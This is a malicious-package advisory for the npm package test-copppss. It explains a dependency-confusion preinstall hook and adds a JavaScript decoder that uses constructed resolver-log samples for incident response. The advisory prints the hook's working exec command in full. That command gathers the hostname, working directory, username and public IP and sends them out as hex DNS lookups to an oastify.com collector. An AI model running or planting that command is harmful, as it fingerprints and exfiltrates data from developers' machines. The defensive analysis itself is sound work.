MAL-2026-5926
Malicious code in test-copppss (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (03106e028cee7749b7f3a9b327142fc0a402574bc72f3a62d129aa891afe85fe)

On `npm install`, the package's `preinstall` hook (`node index.js > /dev/null 2>&1`) runs a shell pipeline that collects host identifiers (`hostname`, `pwd`, `whoami`, the package name `test-copppss`, and the machine's public IP via `curl https://ifconfig.me`), hex-encodes the concatenation with `xxd -p`, and exfiltrates it as DNS subdomain lookups to `*.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com` (a Burp Collaborator OAST endpoint controlled by the operator). Code at index.js:2 is `exec("a=$(hostname;pwd;whoami;echo 'test-copppss';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $ut.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com;done")`.

The package metadata (empty description, near-max version `1.999.0` to win semver resolution, single trivial dependency, preinstall beacon) matches the canonical dependency-confusion / namespace-claim reconnaissance shape: the attacker is probing which internal build systems resolve `test-copppss` to this public name and is harvesting the host fingerprint of any environment that does.
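For incident response, the hex labels seen in resolver logs can be decoded to establish which hosts ran the hook and what each one disclosed. The following is an added example, not part of the advisory or the package; the log line format, the function name `decodeBeacons` and all sample values are constructed assumptions.

```javascript
// Collector domain as given in the advisory.
const SUFFIX = ".iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com";

// Constructed resolver-log lines, not real telemetry. The layout
// "time client qtype qname" is an assumption; adapt the split to your schema.
const SAMPLE_LOG = [
  "2026-01-01T10:00:01Z 10.0.0.5 A registry.npmjs.org",
  "2026-01-01T10:00:02Z 10.0.0.5 A 6275696c642d3031202f7372762f63692f61707020636975736572207465" + SUFFIX,
  "2026-01-01T10:00:02Z 10.0.0.5 AAAA 6275696c642d3031202f7372762f63692f61707020636975736572207465" + SUFFIX,
  "2026-01-01T10:00:03Z 10.0.0.5 A 73742d636f7070707373203230332e302e3131332e370a" + SUFFIX + ".",
];

// Rebuild, per querying client, the bytes the preinstall hook sent out.
function decodeBeacons(lines) {
  const perClient = new Map();
  for (const line of lines) {
    const [, client, , rawName] = line.trim().split(/\s+/);
    if (!rawName) continue;
    const qname = rawName.toLowerCase().replace(/\.$/, ""); // drop root dot
    if (!qname.endsWith(SUFFIX)) continue;
    const label = qname.slice(0, -SUFFIX.length);
    // `xxd -p` emits at most 60 hex chars (30 bytes) per line: one label each.
    if (!/^(?:[0-9a-f]{2}){1,30}$/.test(label)) continue;
    const chunks = perClient.get(client) ?? [];
    // nslookup may ask A and AAAA for the same name: skip consecutive repeats.
    if (chunks[chunks.length - 1] !== label) chunks.push(label);
    perClient.set(client, chunks);
  }
  const out = {};
  for (const [client, chunks] of perClient) {
    const text = Buffer.from(chunks.join(""), "hex").toString("utf8").trim();
    // Unquoted `echo $a` turns newlines into spaces, so fields are
    // space-separated; a working directory containing spaces shifts them.
    const [hostname, cwd, user, pkg, publicIp] = text.split(" ");
    out[client] = { text, hostname, cwd, user, pkg, publicIp };
  }
  return out;
}

console.log(decodeBeacons(SAMPLE_LOG));
```

Because the pipeline passes through `head`, at most ten 30-byte chunks (300 bytes) leave each host, so long paths can truncate the later fields.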
Affected packages
No fixed version published yet for test-copppss (npm). Pin to a known-safe version or switch to an alternative.